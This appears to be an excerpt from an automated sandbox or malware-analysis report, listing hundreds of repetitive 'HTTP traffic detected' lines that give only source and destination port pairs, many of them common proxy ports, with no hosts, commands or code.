                      Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8443 -> 50203
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50510
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50564 -> 11
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 3129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50700 -> 20132
                      Source: unknownNetwork traffic detected: HTTP traffic on port 9741 -> 50492
                      Source: unknownNetwork traffic detected: HTTP traffic on port 6764 -> 50429
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49579 -> 50334
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 6432
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50797 -> 9764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50716 -> 13326
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50591
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50757 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 46523
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 9445
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 44957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 15084
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 8291
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50736 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50594 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50831 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50791 -> 54368
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 9999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 6467 -> 50590
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 17317
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50752 -> 999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50466 -> 11673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50498 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50725 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50815 -> 5032
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50766 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 56862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50717 -> 35618
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50715 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50880 -> 9764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 33328
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 11232
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50480
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50845 -> 35860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 15303
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50720 -> 9002
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50490 -> 39796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50869 -> 31280
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50872 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50728 -> 8000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50868 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 23859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 9002
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50700 -> 20132
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50545 -> 9251
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50769 -> 82
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 38080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50860 -> 15673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 50586
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50787 -> 53882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50902 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50901 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 44612
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50852 -> 8443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 7890
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 35982
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50971 -> 32988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50863 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50821 -> 8089
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50865 -> 8088
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50934 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50947 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51013 -> 9764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 16379
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 56367
                      Source: unknownNetwork traffic detected: HTTP traffic on port 128 -> 50812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 60083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50957 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 4441
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50988 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 48425
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50251 -> 54395
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51035 -> 9180
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51009 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51002 -> 8291
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51073 -> 38080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 41649
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 46015
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 44957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51020 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 11232
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 15084
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 7878
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51070 -> 15303
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50383 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51072 -> 31280
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51092 -> 9764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50808 -> 7302
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51074 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51055 -> 9090
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51075 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 34644
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50466 -> 11673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 46523
                      Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50498
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 8181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 53299
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50700 -> 20132
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 17525
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32650 -> 50382
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51094 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51077 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50995 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50791 -> 54368
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7890 -> 50014
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50971 -> 32988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 56862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50326
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51093 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51121 -> 38080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50695 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50393 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50428 -> 8730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51103 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51106 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51084 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 49969
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51114 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51060 -> 36457
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51087 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50470 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50431 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50491 -> 53948
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51113 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51079 -> 9091
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50299 -> 2002
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50545 -> 9251
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51115 -> 15673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51091 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50583 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51017 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51150 -> 15303
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51135 -> 5032
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51153 -> 31280
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51177 -> 38080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50717 -> 35618
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50354 -> 5678
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51143 -> 8291
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51151 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51198 -> 54467
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51105 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 18080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51126 -> 8443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 44957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 41649
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51187 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51174 -> 128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51145 -> 8193
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50971 -> 32988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50543 -> 27877
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51199 -> 31633
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50682 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50697 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51127 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51224 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51190 -> 46859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51293 -> 8000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 9445
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 15084
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51249 -> 7757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51235 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51175 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51243 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51250 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50769 -> 82
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50787 -> 53882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8089 -> 50821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51264 -> 34139
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51279 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51232 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51295 -> 41920
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 11232
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 17317
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50768 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51359 -> 19072
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50818 -> 31654
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50837 -> 57728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50829 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51366 -> 34409
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51167 -> 5678
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 43840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 51079
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51344 -> 33190
                      Source: unknownNetwork traffic detected: HTTP traffic on port 128 -> 51174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51051 -> 48606
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51401 -> 15303
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50835 -> 8088
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51091
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51085 -> 19404
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51422 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51273 -> 15673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50698 -> 32650
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51306 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50791 -> 54368
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50914 -> 64947
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50888 -> 27391
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51326 -> 2019
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51113 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50884 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7302 -> 50808
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50823 -> 1976
                      Source: unknownNetwork traffic detected: HTTP traffic on port 19072 -> 51359
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51438 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50886 -> 6049
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51405 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50949 -> 28106
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51111 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51449 -> 8118
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51436 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51452 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51439 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50919 -> 34405
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51358 -> 82
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51227 -> 8181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50928 -> 18936
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51468 -> 6539
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51409 -> 7302
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51469 -> 46451
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51393 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51390 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51175
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51474 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51435 -> 15673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51199 -> 31633
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51487 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51485 -> 2692
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51249 -> 7757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50466 -> 11673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51506 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51510 -> 31654
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51509 -> 57728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8889 -> 49923
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51497 -> 40186
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8118 -> 51449
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51519 -> 23814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51243 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50922 -> 1111
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51476 -> 8193
                      Source: unknownNetwork traffic detected: HTTP traffic on port 2020 -> 49939
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43840 -> 51376
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51264 -> 34139
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51295 -> 41920
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51513 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50953 -> 3129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51498 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51081 -> 60404
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51296 -> 30007
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 64052
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50994 -> 29603
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51560 -> 27391
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51366 -> 34409
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51489 -> 5678
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51461 -> 15758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51506
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51562 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51003 -> 8181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51564 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 2019 -> 51326
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51538 -> 8118
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51516 -> 50
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32650 -> 50698
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51508 -> 18080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 46523
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50971 -> 32988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 56862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51566 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51533 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51344 -> 33190
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50759 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51233 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51569 -> 59778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51577 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51531 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51542 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51570 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50072
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51468 -> 6539
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51551 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51595 -> 57728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 44957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51597 -> 31654
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51600 -> 8083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51129 -> 46164
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 37106
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 21681
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50717 -> 35618
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51572 -> 8123
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51632 -> 42147
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51571 -> 15673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51469 -> 46451
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50545 -> 9251
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51393
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51199 -> 31633
                      Source: unknownNetwork traffic detected: HTTP traffic on port 40186 -> 51497
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51658 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51120 -> 49382
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 12000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51654 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51533
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51588 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51586 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 8082
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51677 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51576 -> 5678
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51606 -> 53281
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51645 -> 8889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51505 -> 7302
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51219 -> 58977
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51603 -> 15599
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8118 -> 51538
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51519 -> 23814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51017 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 64052
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51113 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51249 -> 7757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 51526
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51643 -> 4006
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51215 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51697 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51243 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51683 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51659 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51214 -> 5678
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51253 -> 36702
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51672 -> 8193
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51366 -> 34409
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51734 -> 34409
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51722 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 51572
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51740 -> 60870
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51673 -> 2020
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51379 -> 56560
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51686 -> 3129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 15084
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51358 -> 82
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51752 -> 46164
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51753 -> 57728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51754 -> 31654
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51669 -> 10800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51523 -> 48606
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51665 -> 61700
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51757 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51468 -> 6539
                      Source: unknownNetwork traffic detected: HTTP traffic on port 30007 -> 51296
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 1081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 11 -> 50564
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51801 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 30026
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51732 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51632 -> 42147
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 34644
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 51227
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 11232
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51569 -> 59778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50787 -> 53882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50769 -> 82
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51469 -> 46451
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 9090
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51290 -> 9091
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51355 -> 25859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 8879
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51813 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51313 -> 20283
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51758 -> 8888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7302 -> 51505
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51756 -> 18080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51843 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51830 -> 8083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51845 -> 40280
                      Source: unknownNetwork traffic detected: HTTP traffic on port 4006 -> 51643
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51776 -> 15777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51420 -> 65100
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8082 -> 49790
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51461 -> 15758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51850 -> 56755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 51686
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51856 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51800 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51496 -> 1080
